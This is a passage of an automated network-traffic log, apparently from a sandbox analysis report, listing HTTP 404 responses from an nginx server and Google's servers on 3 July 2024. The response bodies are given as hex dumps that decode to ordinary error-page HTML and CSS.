9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:00:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 07 Nov 2023 07:43:14 GMTETag: W/"afe-6098b1f8c138d"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:00:31 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Tue, 07 Nov 2023 07:43:14 GMTETag: "afe-6098b1f8c138d"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:59:17 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:59:19 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:59:22 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:59:24 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1728X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 